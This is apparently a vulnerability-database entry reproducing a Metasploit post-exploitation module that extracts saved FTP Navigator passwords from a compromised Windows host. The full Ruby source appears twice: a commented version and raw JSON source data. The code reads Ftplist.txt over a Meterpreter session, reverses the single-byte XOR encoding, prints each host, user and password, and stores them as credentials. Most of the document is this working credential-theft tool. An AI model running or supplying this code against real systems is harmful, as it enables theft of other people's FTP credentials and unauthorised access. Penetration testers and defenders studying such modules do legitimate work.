ID MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21
Description
This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/auxiliary/report'
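# Post module that reads FTP Navigator's saved-site list (Ftplist.txt) over a
# Meterpreter session, decodes the stored passwords and records them as FTP
# credentials in the framework database.
#
# The client protects saved passwords only with a single-byte XOR (see
# #decode_pass), so any account that can read Ftplist.txt can recover them.
# Credentials saved in this client on a compromised host should be treated as
# exposed and rotated.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  # Registers the module metadata (name, description, platform, session type).
  #
  # @param info [Hash] metadata passed in by the framework and merged by update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',
      'Description' => %q{
        This module extracts saved passwords from the FTP Navigator FTP client.
        It will decode the saved passwords and store them in the database.
      },
      'License' => MSF_LICENSE,
      'Author' => ['theLightCosine'],
      'Platform' => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ]
    ))
  end

  # Locates Ftplist.txt through the uninstall registry key (falling back to the
  # hard-coded default directory), parses every entry that carries a saved
  # password, prints it and stores it as a credential plus an untried FTP login.
  #
  # @return [void]
  def run
    key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\"
    val_name = "InstallLocation"
    installdir = registry_getvaldata(key, val_name) || "c:\\FTP Navigator\\"
    path = "#{installdir}Ftplist.txt"

    begin
      ftplist = client.fs.file.new(path,'r')
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Unable to open Ftplist.txt: #{e}")
      print_error("FTP Navigator May not Be Installed")
      return
    end

    # Read the list, then always release the remote file handle; the original
    # code never closed it.
    begin
      contents = ftplist.read
    ensure
      ftplist.close
    end

    # NOTE(review): only "\n" is removed here; if Ftplist.txt uses CRLF line
    # endings the last field of each line keeps a trailing "\r" - confirm.
    contents.split("\n").each do |line|
      # Anonymous entries and entries without a saved password hold nothing to report.
      next if line.include? "Anonymous=1"
      next unless line.include? ";Password="

      dpass = ""
      username = ""
      server = ""
      port = ""

      line.split(";").each do |field|
        # "SavePassword=..." also contains "Password=", so it must be skipped
        # before the Password branch below is tested.
        next if field.include? "SavePassword"

        if field.include? "Password="
          dpass = decode_pass(split_values(field))
        elsif field.include? "User="
          username = split_values(field)
        elsif field.include? "Server="
          server = split_values(field)
        elsif field.include? "Port="
          port = split_values(field)
        end
      end

      print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")

      service_data = {
        address: Rex::Socket.getaddress(server),
        port: port,
        protocol: "tcp",
        service_name: "ftp",
        workspace_id: myworkspace_id
      }

      credential_data = {
        origin_type: :session,
        session_id: session_db_id,
        post_reference_name: self.refname,
        username: username,
        private_data: dpass,
        private_type: :password
      }

      credential_core = create_credential(credential_data.merge(service_data))

      login_data = {
        core: credential_core,
        access_level: "User",
        status: Metasploit::Model::Login::Status::UNTRIED
      }

      create_credential_login(login_data.merge(service_data))
    end
  end

  # Returns the value part of a "Name=Value" field.
  #
  # @param field [String] one ";"-separated field of an Ftplist.txt line
  # @return [String, nil] everything after the first "=", or nil when the field has no "="
  def split_values(field)
    # Limit of 2 keeps any further "=" characters inside the value.
    field.split("=",2)[1]
  end

  # Reverses the password obfuscation: every byte is XORed with the fixed key
  # 0x19. This is reversible encoding, not encryption - there is no secret
  # beyond the constant itself.
  #
  # @param encoded [String] the obfuscated password as stored in Ftplist.txt
  # @return [String] the decoded password
  def decode_pass(encoded)
    decoded = ""
    # String#<< with an Integer appends it as a character code.
    encoded.each_byte do |achar|
      decoded << (achar ^ 0x19)
    end
    decoded
  end
end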
{"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-03-03T03:06:02", "viewCount": 111, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR/"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = 
client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645411116}}
{}